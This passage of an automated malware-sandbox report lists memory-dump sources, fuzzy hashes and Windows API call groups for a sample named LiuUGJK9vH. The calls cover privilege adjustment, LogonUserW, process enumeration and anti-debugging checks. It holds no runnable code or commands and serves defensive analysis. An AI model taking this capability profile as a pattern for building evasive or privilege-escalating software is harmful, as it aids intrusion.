                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                      • String ID:
                      • API String ID: 292994002-0
                      • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                      • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                      • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                      • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                      • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                      • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                      • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0046C432
                      • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • CoUninitialize.OLE32 ref: 0046C6B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_memmove
                      • String ID: .lnk
                      • API String ID: 2683427295-24824748
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetNativeSystemInfo$kernel32.dll
                      • API String ID: 2574300362-192647395
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                      • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                      • String ID:
                      • API String ID: 2576544623-0
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: lstrlen
                      • String ID: ($|
                      • API String ID: 1659193697-1631851259
                      APIs
                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Internet$AvailableDataFileQueryRead
                      • String ID:
                      • API String ID: 599397726-0
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02F91459
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02F91463
                      • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 02F91470
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID:
                      • API String ID: 1682464887-0
                      APIs
                        • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                        • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                      • GetLastError.KERNEL32 ref: 00458865
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                      • String ID:
                      • API String ID: 1922334811-0
                      APIs
                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                      • FreeSid.ADVAPI32(?), ref: 0045879B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AllocateCheckFreeInitializeMembershipToken
                      • String ID:
                      • API String ID: 3429775523-0
                      APIs
                      • GetCurrentProcess.KERNEL32(00000003,?,02F93F13,00000003,02FADE80,0000000C,02F9403D,00000003,00000002,00000000,?,02F92038,00000003), ref: 02F93F5E
                      • TerminateProcess.KERNEL32(00000000,?,02F93F13,00000003,02FADE80,0000000C,02F9403D,00000003,00000002,00000000,?,02F92038,00000003), ref: 02F93F65
                      • ExitProcess.KERNEL32 ref: 02F93F77
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      APIs
                      • __time64.LIBCMT ref: 0046889B
                        • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                        • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Time$FileSystem__aulldiv__time64
                      • String ID: 0eL
                      • API String ID: 2893107130-3167399643
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                      • FindClose.KERNEL32(00000000), ref: 0046C72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID:
                      • API String ID: 2295610775-0
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID:
                      • API String ID: 3479602957-0
                      APIs
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                      • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AdjustCloseHandlePrivilegesToken
                      • String ID:
                      • API String ID: 81990902-0
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02F9399E,?,?,00000008,?,?,02F91CF4,00000000), ref: 02F93BD0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      APIs
                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: mouse_event
                      • String ID:
                      • API String ID: 2434400541-0
                      APIs
                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LogonUser
                      • String ID:
                      • API String ID: 1244722697-0
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
